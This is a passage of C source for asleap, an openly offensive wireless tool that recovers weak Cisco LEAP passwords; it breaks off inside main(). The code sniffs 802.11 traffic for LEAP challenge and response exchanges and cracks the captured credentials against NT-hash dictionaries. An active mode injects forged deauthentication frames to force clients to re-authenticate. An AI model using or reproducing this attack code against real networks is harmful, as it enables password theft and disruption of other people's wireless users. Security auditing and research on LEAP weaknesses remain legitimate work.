/*
 * asleap - actively recover weak LEAP passwords.  Pronounced "asleep".
 *
 * Copyright (c) 2004, Joshua Wright <jwright@hasborg.com>
 *
 * $Id: asleap.c,v 1.22 2004/03/28 15:37:02 jwright Exp $
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License version 2 as
 * published by the Free Software Foundation. See COPYING for more
 * details.
 *
 * asleap is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 */

/*
 * Significant code is graciously taken from the following:
 * MS-CHAPv2 and attack tools by Jochen Eisinger, Univ. of Freiburg
 * AirJack drivers by Abaddon.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <ctype.h>
#include <sys/ioctl.h>

#ifdef _LINUX
#include <net/ethernet.h>
#include <net/bpf.h>
#include <sys/types.h>
#include <pcap.h>
#include <netpacket/packet.h>
#include <linux/wireless.h>
#include "ajinject.h"
#else
#include "pcap.h"
typedef unsigned char u8;
typedef unsigned short u16;
#endif

#include "asleap.h"
#include "apeek.h"
#include "utils.h"
#include "common.h"
#include "version.h"

#define SNAPLEN 2312
#define PROMISC 1
#define TIMEOUT 500 /* for pcap */
#define CHANHOP 2 /* in seconds */
#define PROGNAME "asleap"
#define MAXCLIENTLIST 256
#define MAXCHANNEL 11
#define CHANHOPTIME 500000

/* Globals */
pcap_t *p = NULL;
u_char *packet;
struct pcap_pkthdr h;
char   errbuf[PCAP_ERRBUF_SIZE];
struct airjack_data ajdata;
struct dump_output wpcap;
int    sockfd_g;


/* prototypes */
void usage(char *message);
void cleanup();
void print_leapexch(struct asleap_data *asleap_ptr);
void print_hashlast2(struct asleap_data *asleap_ptr);
void print_leappw(struct asleap_data *asleap_ptr);
int gethashlast2(struct asleap_data *asleap_ptr);
int getleappw(struct asleap_data *asleap_ptr);
int findleapexch(struct asleap_data *asleap_ptr, int timeout,
         struct dump_output wpcap, struct offlinepcap_s offlinepcap);
int findstamac(u8 stamac[6], struct clientlist_data *clientlist);
int addstamac(struct clientlist_data *clientlist, u8 stamac[6], int clntcntr);
int getpacket(struct offlinepcap_s offlinepcap);


/* Program usage. */
void usage(char *message) {

    if (strlen(message) > 0) {
        printf("%s: %s\n", PROGNAME, message);
    }

    printf("Usage: %s [options]\n", PROGNAME);
    printf("\n"
    "\t-i \tInterface to capture on\n"
    "\t-f \tDictionary file with NT hashes\n"
    "\t-n \tIndex file for NT hashes\n"
    "\t-r \tRead from a libpcap file\n"
    "\t-w \tWrite the LEAP exchange to a libpcap file\n"
    "\t-a \tPerform an active attack (faster, requires AirJack drivers)\n"
    "\t-c \tSpecify a channel (defaults to current)\n"
    "\t-o \tPerform channel hopping\n"
    "\t-t \tSpecify a timeout watching for LEAP exchange (default 5 seconds)\n"
    "\t-h \tOutput this help information and exit\n"
    "\t-v \tPrint verbose information (more -v for more verbosity)\n"
    "\t-V \tPrint program version and exit\n"
    "\n");
}


void print_leapexch(struct asleap_data *asleap_ptr) {

    int j;

    printf("\tusername:   ");
    if (IsBlank(asleap_ptr->username)) {
        printf("no username");
    } else {
        printf("%s\n", asleap_ptr->username);
    }

    printf("\tchallenge:  ");
    if (asleap_ptr->challenge == NULL) {
        printf("no challenge");
    } else {
        for (j=0; j < 8; j++) printf("%02x", asleap_ptr->challenge[j]);
    }
    printf("\n");

    printf("\tresponse:   ");
    if (asleap_ptr->response == NULL) {
        printf("no response");
    } else {
        for (j=0; j < 24; j++) {
            printf("%02x", asleap_ptr->response[j]);
        }
    }
    printf("\n");

}

void print_hashlast2(struct asleap_data *asleap_ptr) {

    printf("\thash bytes: ");
    if (asleap_ptr->endofhash[0] == 0 && asleap_ptr->endofhash[1] == 0) {
        printf("no NT hash ending known.");
    } else {
        printf("%02x%02x", asleap_ptr->endofhash[0], asleap_ptr->endofhash[1]);
    }
    printf("\n");

}

void print_leappw(struct asleap_data *asleap_ptr) {

    int j;

    printf("\tNT hash:    ");
    /* Test the first 4 bytes of the NT hash for 0's.  A nthash with 4
       leading 0's is unlikely, a match indicates a unused field */
    if (asleap_ptr->nthash[0] == 0 && asleap_ptr->nthash[1] == 0 &&
        asleap_ptr->nthash[2] == 0 && asleap_ptr->nthash[3] == 0) {
        printf("no matching NT hash was found.");
    } else {
        for (j=0; j < 16; j++) {
            printf("%02x", asleap_ptr->nthash[j]);
        }
    }
    printf("\n");

    printf("\tpassword:   ");
    if (IsBlank(asleap_ptr->password)) {
        printf("no matching password was found.");
    } else {
        printf("%s", asleap_ptr->password);
    }
    printf("\n");

}


void cleanup() {

    if (p != NULL) {
        printf("Closing pcap ...\n");
        pcap_close(p);
    }
    if (wpcap.wp != NULL) {
        printf("Closing output pcap ...\n");
#ifdef _LINUX
        pcap_dump_flush(wpcap.wp);
#endif
        pcap_dump_close(wpcap.wp);
    }

    exit(0);
}


int gethashlast2(struct asleap_data *asleap_ptr) {

    int i;
    unsigned char zpwhash[7] = { 0, 0, 0, 0, 0, 0, 0 };
    unsigned char cipher[8];

    for (i = 0; i <= 0xffff; i++) {
        zpwhash[0] = i >> 8;
        zpwhash[1] = i & 0xff;

        DesEncrypt(asleap_ptr->challenge, zpwhash, cipher);
        if (memcmp(cipher, asleap_ptr->response + 16, 8) == 0) {
            /* Success in calculating the last 2 of the hash */
            /* debug - printf("%2x%2x\n", zpwhash[0], zpwhash[1]); */
            asleap_ptr->endofhash[0] = zpwhash[0];
            asleap_ptr->endofhash[1] = zpwhash[1];
            return 0;
        }
    }

    return(1);
}


/* Accepts the populated asleap_data structure with the challenge and 
   response text, and our guess at the full 16-byte hash (zpwhash). Returns 1
   if the hash does not match, 0 if it does match. */
int testchal(struct asleap_data *asleap_ptr, unsigned char *zpwhash) {

    unsigned char cipher[8];

    DesEncrypt(asleap_ptr->challenge, zpwhash, cipher);
    if (memcmp(cipher, asleap_ptr->response, 8) != 0)
        return(1);

    DesEncrypt(asleap_ptr->challenge, zpwhash + 7, cipher);
    if (memcmp(cipher, asleap_ptr->response + 8, 8) != 0)
        return(1);

    /* else - we have a match */
    return(0);
}



/* Brute-force all the matching NT hashes to discover the clear-text password */
int getleappw(struct asleap_data *asleap_ptr) {

    unsigned char zpwhash[16] =
        { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
    struct hashpass_rec rec;
    struct hashpassidx_rec idxrec;
    char password_buf[MAX_NT_PASSWORD];
    int  passlen, recordlength, passwordlen, i;
    FILE *buffp, *idxfp;
    unsigned long idxfilelen=0;
    struct stat idxfilestat;

#ifdef _LINUX
    int  unbuffp, offset;
    caddr_t base;
    struct stat hashfilestat;
#endif


    /* If the user passed an index file for our reference, use mmap() to
       map the file and perform lookups based on indexed offsets.
       If there is no index file, perform a linear search. 
    */

    if (IsBlank(asleap_ptr->dictidx)) {

        /* We have no index file.  Do a linear search */
        if((buffp = fopen(asleap_ptr->dictfile, "rb")) == NULL) {
            perror("[getleappw] fopen");
            return(-1);
        }

        fflush(stdout);
        while(!feof(buffp)) {

            memset(&rec, 0, sizeof(rec));
            memset(&password_buf, 0, sizeof(password_buf));
            memset(&zpwhash, 0, sizeof(zpwhash));
            fread(&rec.rec_size, sizeof(rec.rec_size), 1, buffp);
            recordlength = abs(rec.rec_size);
            passlen = (recordlength - (17)); 
            fread(&password_buf, passlen, 1, buffp);
            fread(&zpwhash, 16, 1, buffp);
        
        /* Test last 2 characters of NT hash value of the current entry in the
           dictionary file.  If the 2 bytes of the NT hash don't
           match the calculated value that we store in asleap.endofhash, then
           this NT hash isn't a potential match.  Move on to the next entry. */
            if (zpwhash[14] != asleap_ptr->endofhash[0] ||
                zpwhash[15] != asleap_ptr->endofhash[1]) {
                /* last 2 bytes of hash don't match - continue */
                continue;
            }

            /* With a potential match, test with this challenge */
            if (testchal(asleap_ptr, zpwhash) == 0) {
                /* Found a matching password!  Store in the asleap_ptr struct */
                memcpy(asleap_ptr->nthash, zpwhash, 16);
                strncpy(asleap_ptr->password, password_buf,
                    strlen(password_buf));
                fclose(buffp);
                return(1);
            }
        }

        /* Could not find a matching NT hash */
        fclose(buffp);

    } else {  /* Use referenced index file for hash searches */

        /* 
           Cygwin installations beef on mmap() calls to map large files
           (1GB file generates a "mmap: Not enough core" error).
           We fread() instead.  Ugh. 
        */
        
        if ((idxfp = fopen(asleap_ptr->dictidx, "rb")) == NULL) {
            perror("[getleappw] Cannot open index file");
            return(-1);
        }

        /* Determine the file size of the index so we know when to stop
           reading */
        stat(asleap_ptr->dictidx, &idxfilestat);
        idxfilelen = idxfilestat.st_size;


#ifdef _LINUX

        if ((unbuffp = open(asleap_ptr->dictfile, O_RDONLY, 0)) < 0) {
            perror("[getleappw] Cannot open dictionary+hash file");
            fclose(idxfp);
            return(-1);
        }

        /* Determine the file size of the dict+hash file to pass to mmap */
        stat(asleap_ptr->dictfile, &hashfilestat);


        /* mmap the dict+hash file into memory */
        base = mmap(0, hashfilestat.st_size, PROT_READ, MAP_SHARED, 
            unbuffp, 0);
        if (base == MAP_FAILED) {
            perror("[getleappw] mmap");
            close(unbuffp);
            fclose(idxfp);
            return(-1);
        }
    
        /* fd for hash file is no longer needed */
        close(unbuffp);
        
#else

        /* Open the file with a buffered file handle, since we can't mmap */
        if((buffp = fopen(asleap_ptr->dictfile, "rb")) == NULL) {
            perror("[getleappw] fopen");
            return(-1);
        }

#endif

        /* Read through the index file until we find the entry that matches
           our hash information */
        while (idxrec.hashkey[0] != asleap_ptr->endofhash[0] ||
               idxrec.hashkey[1] != asleap_ptr->endofhash[1]) {

            if (fread(&idxrec, sizeof(idxrec), 1, idxfp) != 1) {
                /* Unsuccessful fread, bail */
                perror("fread[idxrec]");
                fclose(idxfp);
#ifndef _LINUX
                fclose(buffp);
#endif
                return(-1);

            }
        }


        /* The offset entry in the idxrec struct points to the first
           hash+pass record in the hash+pass file that matches our offset.  The
           idxrec struct also tells us how many entries we can read from the
           hash+pass file that match our hashkey information.  Collect records
           from the hash+pass file until we read through the number of records
           in idxrec.numrec */

#ifdef _LINUX

        offset = idxrec.offset;

#else

        /* fseek to the correct offset in the file */
        if (fseek(buffp, idxrec.offset, SEEK_SET) < 0) {
            perror("[getleappw] fread");
            fclose(buffp);
            fclose(idxfp);
            return(-1);
        }

#endif

        for (i=0; i < idxrec.numrec; i++) {

            memset(&rec, 0, sizeof(rec));
            memset(&password_buf, 0, sizeof(password_buf));
#ifdef _LINUX
            memcpy(&rec.rec_size, base+offset, sizeof(rec.rec_size));
#else
            fread(&rec.rec_size, sizeof(rec.rec_size), 1, buffp);
#endif

            /* The length of the password is the record size, -16 for the hash,
              -1 for the record length byte. */
            passwordlen = rec.rec_size - 17;

            /* Check for corrupt data conditions, prevent segfault */
            if (passwordlen > MAX_NT_PASSWORD) {
                fprintf(stderr, "Reported password length (%d) is longer than "
                        "the max password length (%d).\n", passwordlen,
                        MAX_NT_PASSWORD);
                return(-1);
            }

            /* Gather the clear-text password from the dict+hash file,
               then grab the 16 byte hash */
#ifdef _LINUX
            memcpy(password_buf, base+offset+1, passwordlen);
            memcpy(&zpwhash, base+offset+1+passwordlen, sizeof(zpwhash));
#else
            fread(&password_buf, passwordlen, 1, buffp);
            fread(&zpwhash, sizeof(zpwhash), 1, buffp);
#endif


            /* Test the challenge and compare to our hash */
            if (testchal(asleap_ptr, zpwhash) == 0) {
                /* Found a matching password!  Store in the asleap_ptr struct */
                memcpy(asleap_ptr->nthash, zpwhash, 16);
                strncpy(asleap_ptr->password, password_buf,
                    strlen(password_buf));
#ifdef _LINUX
                munmap(base, hashfilestat.st_size);
#else
                fclose(buffp);
#endif
                fclose(idxfp);
                /* success */
                return(1);
            }

            /* No match, continue looking */
#ifdef _LINUX
            offset = offset + rec.rec_size;
#endif

        }

        /* Could not find a match - bummer */
#ifdef _LINUX
        munmap(base, hashfilestat.st_size);
#else
        fclose(buffp);
#endif
        fclose(idxfp);

    }

    return(0);

}

/* The findleap process accepts a timeout duration to capture traffic.  If
   LEAP traffic is discovered within the timeout duration, return 0.
   If not, return 1. 
   This function will test for a success or failure packet following the LEAP
   authentication exchange process.  If the exchange fails, or if the timeout
   duration expires before a success packet is found, findleapexch will
   silently return 1, without indicating that a challenge/response was captured.
   If the user passes a -v flag, findleapexch will identify when it finds the
   challenge and response, and if the authentication was successful or not. */
int findleapexch(struct asleap_data *asleap_ptr, int timeout, 
     struct dump_output wpcap, struct offlinepcap_s offlinepcap) {

    struct ieee80211 *dot11_ptr;
    struct ieee8021x *dot1x_ptr;
    struct eap_leap *leap_ptr;
    struct timeval then, now;
    int    epochstart, elapsed, n;
    int    foundleapchal=0, foundleapresp=0, foundleapsuccess=0;

    gettimeofday(&then, NULL);
    epochstart = ((then.tv_sec * 1000000) + then.tv_usec);

    /* Start a while() loop that ends only when the timeout duration is
       exceeded, or LEAP credentials are discovered. */

    while(1) {

        if (foundleapchal && foundleapresp && foundleapsuccess) {
            return(0);
        }

        /* Test for out timeout condition */
        if (timeout != 0) {
            gettimeofday(&now, NULL);
            /* Get elapsed time, in seconds */
            elapsed = 
              ((((now.tv_sec * 1000000) + now.tv_usec) - epochstart) / 1000000);
            if (elapsed > timeout) 
                return(1);
        }

        /* Capture a packet for analysis */
        n = getpacket(offlinepcap);
        if (n < 0) {
            continue;
        } else if (n == 1) {
            if (asleap_ptr->verbose) printf("Reached EOF on pcapfile.\n");
            cleanup(); /* exits */
        }
             
        if (packet == NULL) 
            continue; 
 
        if (asleap_ptr->verbose > 2) {
            lamont_hdump(packet, h.len); 
            printf("\n");
        }

       /* If we haven't found the LEAP exchange credentials yet, 
          start looking */
        if (!foundleapchal) {
 
            /* We have a captured packet, start testing it for EAP-Challenge */
            dot11_ptr = (struct ieee80211 *)&packet[0];
            /* Most of the frames we receive in RFMON will be management 
               frames, so check for those first and continue if not what we 
               are looking for. */
            if (dot11_ptr->type != 2  || dot11_ptr->subtype != 0)
                continue;
    
            /* Test for 802.1x/EAP frames.  24 bytes for the 802.11 header and
               8 bytes for the 802.2 header makes our offset 32 bytes.  The 
               offset for the LEAP header is 32 + 4 bytes for the 802.1x 
               header. */
            dot1x_ptr = (struct ieee8021x *)&packet[32];
            leap_ptr = (struct eap_leap *)&packet[36];
   
            /* Test multiple criteria to determine if this is an EAP/LEAP packet
               We want an AP to STA challenge, not the following STA to AP
               challenge.  Ethereal tracks state of the LEAP negotiation to
               determine if this is STA->AP or AP->STA, but I'm too lazy.  
               Instead, we compare the BSSID and the dst MAC - if they are 
               the same, then the challenge came from the STA.  If they are 
               different, the challenge came from the AP.  This assumes the 
               AP SRC and BSSID are the same, which should be the case in 
               infrastructure networks. */
            if (dot1x_ptr->version != 1 || dot1x_ptr->type != 0 ||
                leap_ptr->code != 1 || leap_ptr->type != 17 ||
                leap_ptr->version != 1 || 
                !(memcmp(dot11_ptr->addr1, dot11_ptr->addr3, 6)) ){
                continue;
            } else {
                foundleapchal=1;
                if (asleap_ptr->verbose) {
                    printf("\n\nCaptured LEAP challenge:\n");
                    lamont_hdump(packet, h.len);
                    printf("\n");
                }

                /* If a filename was passed for the output file, we write this
                   record with pcap_dump.  If we are not reading from a pcap
                   source, we have already kludged h in getpacket to have the
                   needed information. */
                if (!IsBlank(wpcap.wfilename)) {
                    pcap_dump((u_char *)wpcap.wp, &h, packet); 
                }

                /* We have captured a LEAP challenge packet.  Populate asleap,
                   then continue to collect traffic */
                memcpy(asleap_ptr->challenge, &packet[44], 8);
                /* The username is variable length, but can be calculated by
                   taking the reported length of the EAP packet - 16 */
                memcpy(asleap_ptr->username, &packet[52], 
                    (ntohs(leap_ptr->length) - 16));

                /* We want another packet, continue at while(1) loop */
                continue;

            } /* End if (dot1_ptr->version ... */

        } /* End if (!foundleapchal) */


        /* If we haven't found the LEAP response yet, start looking */
        if (!foundleapresp && foundleapchal) {

            /* Continue capturing packets, looking for a response to the 
               LEAP challenge */

            /* Check for 802.11 data frames */
            dot11_ptr = (struct ieee80211 *)packet;
            if (dot11_ptr->type != 2  || dot11_ptr->subtype != 0)
                continue;

            dot1x_ptr = (struct ieee8021x *)&packet[32];
            leap_ptr = (struct eap_leap *)&packet[36];

            /* Test for EAP/LEAP packet, response */
            if (dot1x_ptr->version != 1 || dot1x_ptr->type != 0 ||
                leap_ptr->code != 2 || leap_ptr->type != 17 ||
                leap_ptr->version != 1) {
                continue;
            } else {
                /* Cool, found a response to the challenge */
                foundleapresp = 1;
                if (asleap_ptr->verbose) {
                    printf("Captured LEAP response:\n");
                    lamont_hdump(packet, h.len);
                    printf("\n");
                }

                /* If a filename was passed for the output file, we write this
                   record with pcap_dump */
                if (!IsBlank(wpcap.wfilename)) {
                    pcap_dump((u_char *)wpcap.wp, &h, packet); 
                }

                memcpy(asleap_ptr->response, &packet[44], 24);
                continue;

            } /* End dot11_ptr typeset ... */
            
        } /* End if(!foundleapresp) */


        /* If we haven't found the LEAP auth success yet, start looking */
        if (!foundleapsuccess && foundleapresp && foundleapchal) {

            /* Continue capturing packets, looking for a response to the 
               LEAP repsponse indicating success or failure */

            /* Check for 802.11 data frames */
            dot11_ptr = (struct ieee80211 *)packet;
            if (dot11_ptr->type != 2  || dot11_ptr->subtype != 0)
                continue;

            dot1x_ptr = (struct ieee8021x *)&packet[32];
            leap_ptr = (struct eap_leap *)&packet[36];

            /* Test for EAP/LEAP packet, response */
            if (dot1x_ptr->version != 1 || dot1x_ptr->type != 0 ||
                !(leap_ptr->code > 2)) {
                continue;
            } else {

                /* Found a success/failure message */
                if (leap_ptr->code == 4) {
                    /* Bummer, authentication failed. */
                    if (asleap_ptr->verbose) {
                        printf("Captured LEAP auth failure:\n");
                        lamont_hdump(packet, h.len);
                        printf("\n");
                    }
                    /* Since we are not matching usernames, continue */
                    continue; 

                } else if (leap_ptr->code == 3) {
                    /* Rockin, authentication successful */
                    foundleapsuccess = 1;
                    if (asleap_ptr->verbose) {
                        printf("Captured LEAP auth success:\n");
                        lamont_hdump(packet, h.len);
                        printf("\n");
                    }

                    /* If a filename was passed for the output file, we write
                       the record with pcap_dump */
                    if (!IsBlank(wpcap.wfilename)) {
                        pcap_dump((u_char *)wpcap.wp, &h, packet); 
                    }

                    asleap_ptr->eapsuccess = 1; 

                } else {

                    /* Got an EAP-looking packet, but it's not a 
                       success/failure message */

                    if (asleap_ptr->verbose) {
                        printf("Captured unknown EAP code: %d\n", 
                            leap_ptr->code);
                        lamont_hdump(packet, h.len);
                        printf("\n");
                    }
                    continue;

                } /* End if leap->code == 4 */

            } /* End test for EAP Success/Failure message */

        } /* End if(!foundleapsuccess) */

    } /* End while(1) loop */

} /* End findleapexch() */



/* findcliententry accepts the MAC addresses of the STA and BSSID, and a
   pointer to the array of structs containing previously discovered stations.
   If the STA and BSSID have already been added to the struct, we return 1.
   Else, we return 0. */
int findstamac(u8 stamac[6], struct clientlist_data *clientlist) {

   int i, found=0;

   for(i=0; i < MAXCLIENTLIST; i++) {
       if (memcmp(clientlist[i].stamac, stamac, 6) == 0) {
           found=1;
           break;
       }

       /* If we have a member of clientlist that is NULL, we have reached 
          past the last added member of the struct.  We don't need to look any
          further. */
       // Fix this stupid nonsense
       if(memcmp(clientlist[i].stamac, "\0\0\0\0\0\0", 1) == 0)  {
            found=0;
            break;
       }
   }

   return(found);

}

/* addstamac() accepts the array of observed stations, the new station to add,
   and the current counter position in the array of stations.  addstamac() does
   not check to see if the entry has been added already, assumes findstamac()
   has been run to identify if this is a new station or not. 
   This function returns the new value of the current position in the clientlist
   array. */
int addstamac(struct clientlist_data *clientlist, u8 stamac[6], int clntcntr) {

    memcpy(clientlist[clntcntr].stamac, stamac, 6);
    clntcntr++;
    if (clntcntr > MAXCLIENTLIST) {
        /* Clear the stored array.  Everyone is a fresh target
           again.  This sucks, I know.  Laziness kills. */
        clntcntr=0;
        memset(clientlist, 0, sizeof(clientlist));
    }

    return(clntcntr);
}

/* Populate global packet[] with the next available packet */
int getpacket(struct offlinepcap_s offlinepcap) {

    struct timeval tv;
    int    n, pcapno, len;
    struct apeekl_rec_h apeeklprec;
    struct apeekx_rec_h apeekxprec;
    struct timeval ptstamp;
    fd_set rset;

    if (offlinepcap.offlinetype) {
        switch(offlinepcap.offlinetype) {
            case LIBPCAP_OFFLINE_PCAP: 
                if (!(packet = (u_char *)pcap_next(p, &h)) == 0) {
                    return(0);
                } else { 
                    return(1);
                }
                return(0);
                break;

            case APEEK_LEGACY_OFFLINE_PCAP: 

                /* Populate the Airopeek Packet Record for record length and
                   other information. */
                if (fread(&apeeklprec, sizeof(apeeklprec), 1,  
                    offlinepcap.apeekfp) < 1) {
                    /* Reached EOF on AiroPeek file */
                    return(1);
                }

                /* Change byte ordering for packet length */
                apeeklprec.length = ntohs(apeeklprec.length);
                apeeklprec.slice_length = ntohs(apeeklprec.slice_length);

                /* The value of slice_length overrides the reported length of
                 * the packet. */
                if (apeeklprec.slice_length) {
                    len = apeeklprec.slice_length;
                } else {
                    len = apeeklprec.length;
                }

                /* Round up packet length to even byte boundary */
                if (len % 2) 
                    len++;

                /* Check for corrupt data */
                if (len > MAX_80211_PACKET_LEN) {
                    fprintf(stderr, "Bad packet length: %d.\n", len);
                    return(-1);
                }

                /* The packet length reported by AiroPeek includes 4 preceding
                   bytes of 802.11 signal information, and a trailing 4 bytes
                   for the FCS.  We include the preceding 4 bytes in the per-
                   packet header, so read 4 fewer bytes here for just the raw
                   packet payload. */
                len = len - 4;

                /* free up the memory used for the previous packet */
                if (packet != NULL) {
                    free(packet);
                }

                /* Allocate len bytes for this packet */
                if ((packet = malloc(len)) == NULL) {
                    fprintf(stderr, "Unable to allocate %d bytes of memory.\n",
                        len);
                    perror("getpacket[malloc]");
                    return(-1);
                }

                /* Kludge up the pcap header to we can use pcap_dump to write
                 * out packets */
                h.caplen = h.len = len;
                gettimeofday(&ptstamp, NULL);
                h.ts.tv_sec = ptstamp.tv_sec;
                h.ts.tv_usec = ptstamp.tv_usec;

                if (fread(packet, len, 1, offlinepcap.apeekfp) < 1) {
                    return(1);
                } else {
                    return(0);
                }
                break;

            case APEEK_XML_OFFLINE_PCAP:
                /* Airopeek 2.x and later save file format */
                
                memset(&apeekxprec, 0, sizeof(apeekxprec));

                /* populate global packet[] */
                if (packet != NULL) {
                    free(packet);
                }

                /* Get the per-packet record header */
                if (fread(&apeekxprec, sizeof(apeekxprec), 1, 
                     offlinepcap.apeekfp) < 1) {
                    /* Reached EOF on AiroPeek file */
                    return(1);
                }

                /* The record header stores the record length in two fields.
                 * Use this to identify incorrect file handling or a corrupt
                 * file location. 
                 */
                if (apeekxprec.length1 != apeekxprec.length2) {
                    fprintf(stderr, "Mismatch in record length detected.\n");
                    return(-1);
                }

                if ((packet = malloc(apeekxprec.length1+1)) == NULL) {
                    fprintf(stderr, "Unable to allocate %d bytes of memory.\n",
                            apeekxprec.length1);
                    perror("getpacket[malloc]");
                    return(-1);
                }

                /* Kludge up the pcap header to we can use pcap_dump to write
                 * out packets 
                 */
                h.caplen = h.len = apeekxprec.length1;
                gettimeofday(&ptstamp, NULL);
                h.ts.tv_sec = ptstamp.tv_sec;
                h.ts.tv_usec = ptstamp.tv_usec;


                /* Populate packet[] with the payload information */
                if (fread(packet, apeekxprec.length1, 1, 
                     offlinepcap.apeekfp) < 1) {
                    return(1);
                } else {
                    return(0);
                }

                break;
                
            default:
                /* Shouldn't happen */
                fprintf(stderr, "Unknown error processing offline pcap "
                                "file.\n");
                return(-1);
        }

        /* Shouldn't get here */
        return(-1);

    } else { /* we are reading from a live interface. */

        /* select on the pcap fd, waiting for a packet */
        tv.tv_sec=0;
        tv.tv_usec=250000;
        pcapno = pcap_fileno(p); 
        FD_ZERO(&rset);
        FD_SET(pcapno, &rset);
        n = select(pcapno+1, &rset, NULL, NULL, &tv);
        /* select() will return > 0 if something interesting was found */
        if (n < 1) {
            /* Check for errors */
            if (errno == EAGAIN || errno == EINTR || errno == 0) {
                return(-2);
            }
        } else if (n == 0) {
            /* select() didn't find anything interesting.  Return. */
            return(-1);
        } else {
            /* select returned a ready filehandle */
            if (!(packet = (u_char *)pcap_next(p, &h)) == 0) {
                return(0);
            } else {
            /* pcap_next returned NULL */
                return(1);
            }
        }

        /* Never gets here */
        return(0);

    }

}
 

#ifdef _LINUX
int deauthsta(ajdata_t *ajdata, u8 *dest, u8 *bssid) {

    int    sock;
    int    len;

    struct ieee80211_mgmt frame;

    len = sizeof(frame);

    if((sock = aj_getsocket(ajdata->ifname)) < 0) {
        perror("aj_getsocket");
        close(sock);
        return(-1);
    }

    /* setup the frame */
    memset(&frame, 0, len);
    frame.frame_control =
        ((WLAN_FC_TYPE_MGMT << 2) | (WLAN_FC_STYPE_DEAUTH << 4));
    memcpy(frame.da, dest, sizeof(frame.da));
    memcpy(frame.sa, bssid, sizeof(frame.sa));
    memcpy(frame.bssid, bssid, sizeof(frame.bssid));
    frame.u.deauth.reason_code = 2;

    //printf("Attempting to send deauthenticate frame.\n");
    //lamont_hdump((u8 *)&frame, len);
    //printf("\n");

    if ((write(sock, &frame, len) < len)) {
        perror("write");
        close(sock);
        return(-1);
    }

    close(sock);
    return(0);
}


/* nextchannel accepts the current channel as input, and returns the new
   channel.  nextchannel returns -1 on error. */
int nextchannel(ajdata_t *ajdata, int currentchannel) {

    int newchannel = 0;
    newchannel = ((currentchannel % MAXCHANNEL) + 1);

    if (aj_setchannel(ajdata->ifname, newchannel) != 0) {
        return(-1);
    } else {
        return(newchannel);
    }

}
#endif


int main(int argc, char *argv[]) {

    int    c, opt_verbose=0, activeattack=0, pcapfile=0;
    char   device[16], dictfile[255], dictidx[255], offline_pcap[255];
    struct asleap_data asleap;
    struct stat dictstat, offlinepcapstat;
    struct clientlist_data clientlist[MAXCLIENTLIST];
    struct offlinepcap_s offlinepcap;
    struct apeekl_master_h masterh;
    struct apeekl_secondary_h secondh;
    struct apeekx_pkts_h apeekpktsh;
    int    channel=0, channelhop=0, findleaptimeout=5;
    int    getleappwret=0;

#ifdef _LINUX
    int    n, clntcntr=0, epochstart=0, elapsed=0;
    struct ieee80211 *dot11_ptr;
    struct timeval then, now;
#endif

    memset(clientlist, 0, sizeof(clientlist));
    memset(device, 0, sizeof(device));
    memset(dictfile, 0, sizeof(dictfile));
    memset(dictidx, 0, sizeof(dictidx));
    memset(offline_pcap, 0, sizeof(offline_pcap));
    memset(&wpcap, 0, sizeof(wpcap));
    memset(&asleap, 0, sizeof(asleap));
    memset(&ajdata, 0, sizeof(ajdata));
    memset(&offlinepcap, 0, sizeof(offlinepcap));
    memset(&apeekpktsh, 0, sizeof(apeekpktsh));
    memset(&h, 0, sizeof(h));
    memset(&wpcap, 0, sizeof(wpcap));

    signal(SIGINT, cleanup);
    signal(SIGTERM, cleanup);
    signal(SIGQUIT, cleanup);


    printf("asleap %s - actively recover LEAP passwords. "
           "<jwright@hasborg.com>\n", VER);

    while ((c = getopt(argc, argv, "oavhVi:f:n:r:w:c:t:")) != EOF) {
        switch(c) {
            case 'i':
                strncpy(device, optarg, sizeof(device)-1);
                break;
            case 'f':
                strncpy(dictfile, optarg, sizeof(dictfile)-1);
                break;
            case 'n':
                strncpy(dictidx, optarg, sizeof(dictidx)-1);
                break;
            case 'w':
                strncpy(wpcap.wfilename, optarg, sizeof(wpcap.wfilename)-1);
                break;
            case 'h':
                usage("");
                exit(0);
                break;
            case 'r':
                strncpy(offlinepcap.filename, optarg, 
                    sizeof(offlinepcap.filename)-1);
                activeattack=0;
                pcapfile=1;
                break;
            case 'v':
                opt_verbose += 1;
                break;
            case 'a':
                activeattack=1;
                break;
            case 'o':
                channelhop=1;  
                break;
            case 'c':
                channel = atoi(optarg);
                break;
            case 't':
                findleaptimeout = atoi(optarg);
                break;
            case 'V':
                /* Already printed version information above */
                exit(0);
                break;
            default:
                usage("");
                exit(1);
        }
    }

    /* Populate the asleap struct with the gathered information */
    asleap.verbose = opt_verbose;
    strncpy(asleap.dictfile, dictfile, sizeof(asleap.dictfile)-1);
    strncpy(asleap.dictidx, dictidx, sizeof(asleap.dictidx)-1);

    /* Populate the ajdata struct with gathered information */
    strncpy(ajdata.ifname, device, sizeof(ajdata.ifname));

#ifndef _LINUX
    if (IsBlank(offlinepcap.filename)) {
        usage("Must supply a stored file with -r");
        exit(1);
    }

#else

    if (IsBlank(device) && IsBlank(offlinepcap.filename)) {
        /* Could lookup the interface with pcap_lookupdev here, too lazy */
        usage("Must supply an interface with -i, or a stored file with -r");
        exit(1);
    }

    if (channel && channelhop) {
        usage("Cannot specify -o and -c");
        exit(1);
    }
#endif

    if (activeattack && (!IsBlank(offlinepcap.filename)) ) {
        /* Can't be an active attack and use a stored pcap file.  Duh. */
        usage("Cannot use -a and -r");
        exit(1);
    }

    if (stat(asleap.dictfile, &dictstat)) {
        /* Could not stat the dictionary file.  Bail. */
        usage("Could not stat the dictionary file.");
        exit(1);
    }

    if (!IsBlank(offlinepcap.filename)) {
        /* Make sure the the file exists */
        if (stat(offlinepcap.filename, &offlinepcapstat) != 0) {
            usage("Could not stat the pcap file.");
            exit(1);
        }
    }


    /* If the user passed the -r flag, open the filename as a captured pcap
       file,  this can be a libpcap file, or a AiroPeek NX file.  
       Otherwise open live from the supplied device name */
    if (!IsBlank(offlinepcap.filename)) {

        /* Determine the capture file type */
        offlinepcap.offlinetype = test_filetype(offlinepcap.filename);

        switch(offlinepcap.offlinetype) {

            case APEEK_XML_OFFLINE_PCAP:
            /* Version 2.X of AiroPeek capture file. */ 
